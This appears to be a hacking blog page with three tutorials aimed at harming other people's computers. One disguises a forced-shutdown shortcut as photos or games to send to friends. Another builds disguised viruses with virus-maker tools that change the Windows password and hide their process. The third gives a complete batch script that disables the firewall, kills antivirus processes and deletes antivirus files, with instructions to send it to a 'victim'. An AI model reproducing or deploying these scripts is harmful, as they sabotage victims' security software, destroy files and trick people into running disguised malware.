Showing posts with label Create virus. Show all posts
Showing posts with label Create virus. Show all posts

Sunday, February 19, 2012

Shutdown your friends computer while chatting


Hack While chatting


1)  Make a shortcut on desktop by Right click on desktop, and then go to New, then Shortcut.

2)  Then in the "type location of the item" type: 
%windir%\system32\shutdown.exe -s -t 120 -c "This is a virus"

Ø    Here 120 in time duration in seconds after which the computer will shutdown.
You can change it to any.
Ø    Here “This is a virus” is the text which will appear on shutdown notice window. You can also change it.

3)  Click on next and given a name click on finish.

4)  Now right click on the shortcut and Change its name and icon to something interesting.


5)  Now to send it to some one you need to make a compressed file by right clicking on the desktop, go to New, Compressed file (zipped). Then Zipped folder will appear.


6)  Drag your shutdown virus into this zipped folder and rename it something interesting like photos/ games etc.

7)  Now send it to your friends and shutdown their pc while chatting.


Tested on: Windows XP





[Note: Be careful in using these scripts, i will not be responsible if you damage your system.] 

Create Your Own Virus using Virus Maker Softwares



In This Tutorial I am gonna tell you an easy way to create viruses using Virus maker softwares named  "JPS Virus Maker" and "teraBIT Virus Maker"

Follow the steps

1. First of all Download any  Virus  maker from both mentioned above, extract the rar file, and then click on the exe.
Now you will get a Screen like this.
TeraBIT VIRUS MAKER

JPS VIRUS MAKER


2. Now Select some from the given options, that option you want in your created virus.

3. For Message with your virus, select the Fake Error Message and write the message you want to display in caption and Title Like "Error" as shown below.

4. To change the Password of the computer on execution of virus check CHANGE XP PASSWORD and type the new password. 

5. Now Select any server Icon or file icon , it will be the icon of the virus file.

6. Now Select any virus Name from the list so it cannot be seen in the process from its own name.

7. Click on the "make virus " Button and your virus will be ready!!!!

8. Now send this file to your friends and see the result.  






[Note: Be careful in using these scripts, i will not be responsible if you damage your system.] 

Saturday, January 14, 2012

How to disable/delete your victim's Antivirus?

Here i am giving you the batch program to disable or delete the antivirus in victims computer.



@ echo off
rem --
rem Permanently Kill Anti-Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
cls
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.dat
cls
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
cls
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*
cls
del /Q /F C:\Program Files\avgamsr\*.exe
del /Q /F C:\Program Files\avgamsvr\*.exe
del /Q /F C:\Program Files\avgemc\*.exe
cls
del /Q /F C:\Program Files\avgcc\*.exe
del /Q /F C:\Program Files\avgupsvc\*.exe
del /Q /F C:\Program Files\grisoft
del /Q /F C:\Program Files\nood32krn\*.exe
del /Q /F C:\Program Files\nood32\*.exe
cls
del /Q /F C:\Program Files\nod32
del /Q /F C:\Program Files\nood32
del /Q /F C:\Program Files\kav\*.exe
del /Q /F C:\Program Files\kavmm\*.exe
del /Q /F C:\Program Files\kaspersky\*.*
cls
del /Q /F C:\Program Files\ewidoctrl\*.exe
del /Q /F C:\Program Files\guard\*.exe
del /Q /F C:\Program Files\ewido\*.exe
cls
del /Q /F C:\Program Files\pavprsrv\*.exe
del /Q /F C:\Program Files\pavprot\*.exe
del /Q /F C:\Program Files\avengine\*.exe
cls
del /Q /F C:\Program Files\apvxdwin\*.exe
del /Q /F C:\Program Files\webproxy\*.exe
del /Q /F C:\Program Files\panda software\*.*
rem --

Copy this code to notepad 
Save it with .bat extension(for eg antdis.bat)
send to your victim.